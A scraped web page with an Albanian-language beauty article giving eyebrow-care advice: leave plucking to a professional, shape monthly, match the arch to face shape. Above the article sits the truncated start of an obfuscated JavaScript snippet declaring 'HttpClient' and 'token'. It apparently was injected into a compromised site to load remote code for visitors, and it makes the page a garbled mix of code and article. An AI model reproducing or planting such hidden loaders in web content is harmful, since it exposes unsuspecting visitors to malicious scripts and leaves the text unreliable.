;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Disa sekrete për vetulla të bukura dhe në formë

By

Gabimet që bëni te vetullat mund të shkaktojnë probleme në pamjen tuaj pasi është e vështirë që ato të rigjenerohen.

Disa artistë make up-i kanë dhënë disa këshilla të vlefshme se çfarë duhet të kenë parasysh:

Mos i hiqni vetë vetullat
Është shumë e vështirë të hiqni vetullat me një dorë e në dorën tjetër të mbani pasqyrën, shkruan living. Në qoftë se nuk i shikoni nuk mund t’i bëni asnjëherë njëlloj, kështu që lërjani në dorë një profesionisteje.

Pastrojini një herë në muaj

Siç bëni me flokët tuaj ashtu duhet t’i pastroni edhe ju vetullat tuaja, duke u dhënë formën e duhur një herë në muaj.

Forma e vetullave duhet të përshtatet me formën e fytyrës
Në qoftë se keni fytyrë të rrumbullakët duhet t’i bëni vetullat me hark të butë, për fytyrën katrore hark më të theksuar, fytyra ovale duhet të ruajë një formë të drejtë të vetullave.

Pastroni cullufet e panevojshme
Cullufe quhen pjesët që dalin në mes të ballit tuaj, të cilat duken keq në qoftë se nuk i pastroni.

Konturojini me laps ose bojë pasi i keni hequr.

Artikuj të ngjashëm